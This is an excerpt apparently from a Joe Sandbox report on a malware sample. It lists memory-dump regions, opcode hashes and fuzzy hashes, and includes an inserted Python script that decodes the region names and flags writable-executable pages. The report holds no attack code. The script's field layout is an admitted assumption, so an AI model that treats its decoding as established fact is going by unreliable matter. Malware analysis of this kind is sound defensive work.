                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 456ea2a6ed4ad29bb7b6036225ba98073052340f0c606fa2c426b1d9f3f9acc7
                                                • Instruction ID: 89f95ce599c1111aba8906c038b587e70895eea3943eb19d38f8776739d72da6
                                                • Opcode Fuzzy Hash: 456ea2a6ed4ad29bb7b6036225ba98073052340f0c606fa2c426b1d9f3f9acc7
                                                • Instruction Fuzzy Hash: 6FC10671914B419BD722DF38C881BEBB7E1BF99300F108E1EE9EA66201EB747584CB55
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f2a53bb5d444d5c426505e80d86f37106fca501abefd58b358519be2d0ffbd03
                                                • Instruction ID: b9459a8edeb4a9ef72628f18af22fae0514dcf9eecd965cf7ae430687407ec7d
                                                • Opcode Fuzzy Hash: f2a53bb5d444d5c426505e80d86f37106fca501abefd58b358519be2d0ffbd03
                                                • Instruction Fuzzy Hash: 587128267086600BDB25493C588037AA7D39BC6321F9E463AE4F9C7386D73DCC46A791
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c7fad8021035c17080fbcd509f3074b4fa5d71b74d89440738095ebeff3274d
                                                • Instruction ID: c854d7fcfc491a291d43f9fa3f849e843d5cfc54c0a91cfb0838f13e6c3506e7
                                                • Opcode Fuzzy Hash: 0c7fad8021035c17080fbcd509f3074b4fa5d71b74d89440738095ebeff3274d
                                                • Instruction Fuzzy Hash: 8481D761D0D78557EA219B359A017BBB7E4BFE5304F059B28BD8C61013FB30B9D88342
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbe8fa7cf3984213c1f5e9bba020e6ca8920d17405a832190fba23ea357c414d
                                                • Instruction ID: 06785faf742125877d7f6712a197d0ae8622c7929a43ba1af29a563b4d609dd3
                                                • Opcode Fuzzy Hash: cbe8fa7cf3984213c1f5e9bba020e6ca8920d17405a832190fba23ea357c414d
                                                • Instruction Fuzzy Hash: 29711576A08B05CBC7109F2CD8A066AB7E1EFD5324F19862CD994473D1D339ED928B81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d9ba97c7db8f3ac0ce03fe04ccf29d259148fd0af972c3b8a447f11533423654
                                                • Instruction ID: dcd5adfd89bbd2522545f9c0dc1361b1a8206e7684e29210451170db0f109880
                                                • Opcode Fuzzy Hash: d9ba97c7db8f3ac0ce03fe04ccf29d259148fd0af972c3b8a447f11533423654
                                                • Instruction Fuzzy Hash: 33810B72D18B928BD3249F28D8806B6B7A0FFDA314F24471EE8D607783E7789981C741
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c97e46d99b76e0866044f674b00e54adb29a62bd2868db7fa1112e81b4381c9
                                                • Instruction ID: 091012cfd9411611a0611faac22de9fbad5736110d0a94633cb8f8a5645f2a12
                                                • Opcode Fuzzy Hash: 6c97e46d99b76e0866044f674b00e54adb29a62bd2868db7fa1112e81b4381c9
                                                • Instruction Fuzzy Hash: 9681F772D14BD28BD3149F74D8806B6B7A0FFEA314F249B1EE8E616742E7789580C781
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16cf045e166333259a7d0f41e5cef4a973fb6ef3c19e92b119e42d225db379ea
                                                • Instruction ID: 2b2832850e67b0e611b6d91166d667ee831bbbe77502221c4022aff9a21c3e5a
                                                • Opcode Fuzzy Hash: 16cf045e166333259a7d0f41e5cef4a973fb6ef3c19e92b119e42d225db379ea
                                                • Instruction Fuzzy Hash: AB717D72D097908BE7228F28C8806A977A2EFD6314F24836EF8D55B353E77D9A41C741
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 386b589ac52e8158e1af4ee19798db3883d7f4f82ad705deebb8b5a2468fd397
                                                • Instruction ID: 10882a4d294e2a1f8677f842fcc25ad7ef977a1ab934f5803775580a2c136e45
                                                • Opcode Fuzzy Hash: 386b589ac52e8158e1af4ee19798db3883d7f4f82ad705deebb8b5a2468fd397
                                                • Instruction Fuzzy Hash: 2E410577F246280BE34CD9699C6926A73C2DBC4310B4A873DDA96C73C1DD74DD16A2C0
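The region names under "Memory Dump Source" carry the information an analyst actually wants from this part of the report: which dumped pages were writable and executable at the time of the snapshot, which is the footprint behind the "Detected unpacking (changes PE section rights)" and self-modifying-code findings. The following parser is an added example, not code from Joe Sandbox or from the analysed sample. Its field layout is an assumption inferred from the names on this page: the fourth dotted field is treated as the region base address, the fifth is matched against the Windows PAGE_* protection constants (0x04, 0x40 and 0x80 all appear above), and the seventh against MEM_IMAGE (0x01000000); the remaining fields are kept opaque. The sample names are copied from the "Associated" list above.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) region names and flag W+X pages.

Added example, not Joe Sandbox code. The field layout is an ASSUMPTION
inferred from the names in this report: proc.stage.region.address.protect.
f6.type.f8.sdmp, with `protect` holding a Windows PAGE_* value and `type`
a MEMORY_BASIC_INFORMATION.Type value. Fields f6 and f8 are not decoded.
"""
import re
from dataclasses import dataclass

# Windows memory protection constants from winnt.h (low byte of the field).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout (see module docstring); all fields are hexadecimal.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<region>[0-9a-f]+)\."
    r"(?P<addr>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    name: str
    address: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:08x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def writable_executable(self) -> bool:
        # Code pages that are also writable: where in-memory unpacking and
        # self-modifying code leave their footprint.
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_sdmp_name(name: str) -> Region:
    """Split one .sdmp file name into its (assumed) fields."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not an sdmp region name: {name!r}")
    return Region(
        name=name,
        address=int(m["addr"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["type"], 16),
    )


def writable_executable_regions(names):
    """Return the base addresses (upper-case hex strings) of W+X regions, ascending."""
    regions = sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.address)
    return [f"{r.address:X}" for r in regions if r.writable_executable]


# Region names copied from the "Associated" list in this report.
SAMPLE_NAMES = [
    "00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        r = parse_sdmp_name(n)
        flag = "W+X" if r.writable_executable else "   "
        print(f"{r.address:016X} {r.protect_name:<24} {r.type_name:<12} {flag}")
    print("W+X regions:", writable_executable_regions(SAMPLE_NAMES))
```

Run against the full "Associated" list, the script separates the PAGE_READWRITE header page at the image base 003C0000 from the executable regions that were writable when dumped; those are the regions worth diffing against the on-disk PE sections when confirming the unpacking finding.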
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true (associated regions and IDA snapshot file identical to the entry above)
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                • Instruction ID: ea0fca6c78fe144c4f922fd8b68341f0a58f36c3bcd3d7ec57f7eadaf324530d
                                                • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                • Instruction Fuzzy Hash: B731C3357483196BD714AD6DC4C022AF6D39BD8360F55C63CE589C33A1FB758C488782
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true (associated regions and IDA snapshot file identical to the entry above)
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                • Instruction ID: dd0b00f2309a0fd1c9a08861d26c6f5ccddc14b632d1e5dd035eb7176c168478
                                                • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                • Instruction Fuzzy Hash: C0F06273B656390BA3A0CDB66D011D7A2C3A7C0770F1FC569EC48D7642E934DC4A86C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true (associated regions and IDA snapshot file identical to the entry above)
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                • Instruction ID: 505357e28481efe0133563568a39935bfdcff2e6b8a8cf3a258c72aa2e2ac747
                                                • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                • Instruction Fuzzy Hash: 07F01C33A20A344B6360CD7A8D05597A2D797C86B0B1FC969ECA5E7206E930EC0656D5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true (associated regions and IDA snapshot file identical to the entry above)
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d7e92aa613ad8b33600af7dff039ae87b9cb51d5340afa9c580d92c827433ae
                                                • Instruction ID: fee3058836185c06e2b68e2a9debc1b9d8edf3821c271cfdb758acd57156ab0d
                                                • Opcode Fuzzy Hash: 2d7e92aa613ad8b33600af7dff039ae87b9cb51d5340afa9c580d92c827433ae
                                                • Instruction Fuzzy Hash: 07B01231A002104F9B06CA34DC710D632B27792300365C4E9D00346032DA35D0038600
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true (associated regions and IDA snapshot file identical to the entry above)
                                                Similarity
                                                • API ID:
                                                • String ID: [
                                                • API String ID: 0-784033777
                                                • Opcode ID: 032d2049e41d0b8dac91a10efc5c410290557a818729eca9b956c43d4e13154d
                                                • Instruction ID: d94b37bb8480c3fb040be5a4450d2e9cedb7dfc60eb336823ca0cbd7bdf3bf2f
                                                • Opcode Fuzzy Hash: 032d2049e41d0b8dac91a10efc5c410290557a818729eca9b956c43d4e13154d
                                                • Instruction Fuzzy Hash: 56B16B71B083B15BDB359A25E89073B7EC8EF55304F9A052FE8C5C6281EB2CD884875B